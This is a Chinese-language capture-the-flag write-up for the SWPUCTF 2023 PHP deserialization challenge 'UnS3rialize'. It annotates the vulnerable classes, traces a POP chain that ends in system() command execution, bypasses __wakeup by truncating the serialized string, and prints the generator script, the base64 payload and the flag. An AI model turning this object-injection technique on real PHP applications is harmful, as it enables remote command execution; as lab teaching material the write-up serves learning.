[SWPUCTF 2023 秋季新生赛]UnS3rialize

Alpha first2024-08-23 17:53

[SWPUCTF 2023 秋季新生赛]UnS3rialize

点开之后得到一串php代码:

php 复制代码 
 <?php
highlight_file(__FILE__);
error_reporting(0);
class NSS
{
    public $cmd;
    function __invoke()
    {
        echo "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
    function __wakeup()
    {
        echo "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}


class C
{
    public $whoami;
    function __get($argv)
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}

class T
{
    public $sth;
    function __toString()
    {
        echo "Now you know how to use __toString<br/>There is more than one way to trigger";
        return $this->sth->var;
    }
}

class F
{
    public $user = "nss";
    public $passwd = "ctf";
    public $notes;
    function __construct($user, $passwd)
    {
        $this->user = $user;
        $this->passwd = $passwd;
    }
    function __destruct()
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
                echo "Now you know how to use __construct<br/>";
                echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
}



if (isset($_GET['ser'])) {
    $ser = unserialize(base64_decode($_GET['ser']));
} else {
    echo "Let's do some deserialization :)";
}
Let's do some deserialization :)

首先审计这段代码。

这段 PHP 代码定义了四个类(NSS、C、T、F),并通过判断是否有特定的 GET 参数来进行反序列化操作。整体功能似乎是通过反序列化用户传入的数据来执行一系列操作,包括输出特定信息和可能执行系统命令,同时也存在一些条件判断以控制输出结果。

以下是对代码的详细解读:

php 复制代码 
 <?php
highlight_file(__FILE__);这个函数会高亮显示当前文
件的代码,通常在调试或展示代码时使用,但在生产环境中
一般不应该使用,因为它可能会暴露敏感信息。
error_reporting(0);    关闭了 PHP 的错误报告。这
在某些情况下可能会隐藏潜在的问题,不利于调试和发现错误。
class NSS  定义了一个名为NSS的类。
{
    public $cmd;声明了一个公共属性cmd,可以从外部
    直接访问和修改。
    function __invoke()  __invoke()魔术方法:当对象
    被当作函数调用时会触发这个方法。它会输出一段文本,
    然后使用system()函数执行$this->cmd所存储的命令。
    这可能存在安全风险,如果cmd的值被恶意控制,可能会
    导致命令执行漏洞。
    {
        echo "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
    function __wakeup()  __wakeup()魔术方法:在对象
    被反序列化时会触发这个方法。它会输出一段文本,并将
    cmd属性设置为固定的字符串。
    {
        echo "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}
class C  定义了一个名为C的类。
{
    public $whoami;公共属性。
    function __get($argv)__get()魔术方法:当尝试访问
    一个不存在的属性时会触发这个方法。它会输出一段文本,
    然后尝试获取whoami属性的值并返回。如果whoami是一个
    可调用的对象,那么会调用它并返回结果,这也可能存在安全风险。
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}
class T   定义了一个名为T的类
{
    public $sth;  公共属性。
    function __toString()           __toString()魔
    术方法:当对象被当作字符串使用时会触发这个方法。它
    会输出一段文本,然后尝试获取$this->sth->var的值并
    返回。如果sth或者sth->var的值被恶意控制,可能会导
    致意外的行为。
    {
        echo "Now you know how to use __toString<br/>There is more than one way to trigger";
        return $this->sth->var;
    }
}
class F  定义了一个名为F的类。
{
    public $user = "nss";
    public $passwd = "ctf";  初始化了两个公共属性,
    分别为用户名和密码。
    public $notes;  另一个公共属性。
    function __construct($user, $passwd) __construct()构
    造方法:接受两个参数并将其分别赋值给user和passwd属性。
    {
        $this->user = $user;
        $this->passwd = $passwd;
    }
    function __destruct()        __destruct()析构方法:
    当对象被销毁时会触发这个方法。它会检查user和passwd是
    否分别为特定的值,如果是,则输出一些文本并显示notes属
    性的值,否则输出错误信息并终止程序。
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
                echo "Now you know how to use __construct<br/>";
                echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
}



if (isset($_GET['ser'])) {
    $ser = unserialize(base64_decode($_GET['ser']));
} else {
    echo "Let's do some deserialization :)";
}检查是否存在$_GET['ser']参数。如果存在,先对其进行
 base64 解码,然后反序列化得到的结果赋值给$ser变量。
 如果不存在这个参数,则输出提示信息。这里的反序列化
 操作如果传入的参数被恶意构造,可能会导致安全问题,
 例如对象注入攻击。
Let's do some deserialization :)

从后往前推,出口是NSS.__invoke()的命令执行

调用此方法往前推到C.__get()

然后就是访问不存在属性,往前推到T.__toString()

再往前推到F.__destruct()

pop链梳理完再看看wakeup的绕过,用的fast-destruct

然后我们构造pop链:

php 复制代码 
F.__destruct() --> T.__toString() --> C.__get() --> NSS.__invoke()

编写如下脚本:

php 复制代码 
<?php
highlight_file(__FILE__);
class NSS
{
    public $cmd='cat /flag';
} 
class T
{
    public $sth;
}

class C
{
    public $whoami;
} 
class F
{
    public $user = "nss";
    public $passwd = "ctf";
    public $notes;
}

$a=new F();
$b=new T();
$c=new C();
$d=new NSS();
$a->user='SWPU';
$a->passwd='NSS';
$a->notes=$b;
$b->sth=$c;
$c->whoami=$d;
$remove=substr(serialize($a), 0, -1); //去掉最后一个花括号
echo base64_encode($remove);

运行之后得到:
得到了一串编码:

php 复制代码 
TzoxOiJGIjozOntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6MTp7czozOiJjbWQiO3M6OToiY2F0IC9mbGFnIjt9fX0=

然后我们构造payload:

php 复制代码 
?ser=TzoxOiJGIjozOntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6MTp7czozOiJjbWQiO3M6OToiY2F0IC9mbGFnIjt9fX0=

接着我们打开HackBar运行一下得到flag:
由此得到本题flag:

NSSCTF{ebc6b78c-cbc4-488e-914c-6f062ad94509}

相关推荐
Coding~10 分钟前
攻防世界38-FlatScience-CTFWeb
开发语言·sql·安全·web安全·php
丁丁丁梦涛12 分钟前
laravel php artisan storage:link 后通过nginx代理访问图片404 not found问题
nginx·php·laravel·storage link
小小工匠28 分钟前
Kafka - 启用安全通信和认证机制_SSL + SASL
安全·kafka·ssl·sasl
kali-Myon1 小时前
ctfshow-web入门-反序列化(web260-web264)
前端·学习·web安全·php·web
Wh1teR0se1 小时前
文件上传漏洞--理论
web安全·网络安全
Diamond技术流1 小时前
从0开始学习Linux——文件管理
linux·运维·学习·安全·文件·权限·极限编程
cliff,2 小时前
【密码学】密钥管理
学习·安全·密码学
网络安全-杰克2 小时前
网络安全常见面试题--含答案
安全·web安全
一只小松许️6 小时前
C++20协程详解
开发语言·php·c++20
热门推荐
01聊聊 Python 中的同步原语,为什么有了 GIL 还需要同步原语02【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总03Windows10安装PCL1.14.0及点云配准04VSCode插件 —— Cody AI (免费AI助手!)05全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO08基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测09Coze扣子平台完整体验和实践(附国内和国际版对比)10C++——超强级病毒代码